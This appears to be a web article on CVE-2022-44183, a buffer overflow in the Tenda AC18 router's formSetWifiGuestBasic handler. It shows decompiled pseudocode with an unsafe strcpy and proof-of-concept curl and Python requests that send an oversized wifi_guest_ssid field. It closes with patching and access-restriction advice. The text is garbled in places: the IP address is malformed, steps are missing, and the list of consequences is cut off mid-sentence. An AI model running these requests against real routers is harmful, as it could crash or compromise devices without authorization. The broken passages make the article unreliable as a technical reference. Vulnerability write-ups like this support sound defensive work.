CVE-2022-44183 - Buffer Overflow Exploit in Tenda AC18 V15.03.05.19 via formSetWifiGuestBasic

In early November 2022, security researchers uncovered a critical buffer overflow vulnerability in the Tenda AC18 router with firmware version V15.03.05.19. This flaw, registered as CVE-2022-44183, allows an authenticated attacker to execute arbitrary code on the router—potentially taking full control of the device. This article deep-dives into CVE-2022-44183, explains how the exploit works, provides reproduction steps, and links to original advisories.

What is the Tenda AC18?

The Tenda AC18 is a popular dual-band gigabit Wi-Fi router used in homes and small offices worldwide. Like many routers, it offers a web-based management interface for configuring settings like Wi-Fi, guest network, and security.

Overview of CVE-2022-44183

CVE-2022-44183 affects the function formSetWifiGuestBasic. This function is responsible for handling configuration changes to the guest Wi-Fi settings. The vulnerability lies in how the function processes certain user-supplied input without proper length or boundary checks, leading to a classic buffer overflow.

Vulnerable function: formSetWifiGuestBasic

Whenever a user modifies guest Wi-Fi settings via the web interface, the router’s backend calls the C function formSetWifiGuestBasic. Within this function, several parameters, such as the wifi_guest_ssid, are copied into fixed-size buffers using unsafe functions like strcpy and strcat, without checking the input length.

This snippet (decompiled, pseudocode) illustrates the risky code

void formSetWifiGuestBasic(request_t *req, response_t *res) {
    char wifi_guest_ssid[64];
    // Get 'wifi_guest_ssid' input from HTTP POST
    char *input = cgiGetParam(req, "wifi_guest_ssid");
    // Unsafe copy
    strcpy(wifi_guest_ssid, input);
    ...
}

In this code, if the attacker sends more than 64 bytes for wifi_guest_ssid, the buffer overflows, potentially overwriting return addresses or adjacent memory structures.

2. Crafting a Malicious Payload

Prepare an HTTP POST request with an overly long wifi_guest_ssid parameter. For demonstration, let’s use A repeated 260 times.

Example payload (using curl)

curl -X POST "http://192.168..1/goform/formSetWifiGuestBasic"; \
     -d "wifi_guest_ssid=$(python -c 'print("A"*260)')" \
     --cookie "SESSION_ID=validsessionid"

Or in Python

import requests

url = "http://192.168..1/goform/formSetWifiGuestBasic";
cookies = {"SESSION_ID": "validsessionid"}  # replace with real session ID
data = {
    "wifi_guest_ssid": "A" * 260,
}
resp = requests.post(url, cookies=cookies, data=data)
print(resp.text)

3. What Happens?

If the router is running affected firmware, this request overflows the buffer. Depending on the exploit payload (if crafted with shellcode or ROP chains), this could:

Original References

- CVE-2022-44183 NVD Entry
- Exploit Database: Tenda AC18 formSetWifiGuestBasic Buffer Overflow
- GitHub PoC by security researchers

Update Firmware: If Tenda releases a patched firmware, update immediately.

2. Limit Admin Access: Restrict web management to local/LAN only.

Conclusion

CVE-2022-44183 is a reminder that home network equipment can contain severe vulnerabilities exploitable by cybercriminals. If you own a Tenda AC18 router, check your firmware version and update if you are running V15.03.05.19. Always keep IoT and network devices updated, and audit exposed interfaces!


*For more technical details or for checking if you’re affected, see the official CVE notice and follow Tenda’s firmware/security updates.*

Timeline

Published on: 11/21/2022 18:15:00 UTC
Last modified on: 11/28/2022 13:32:00 UTC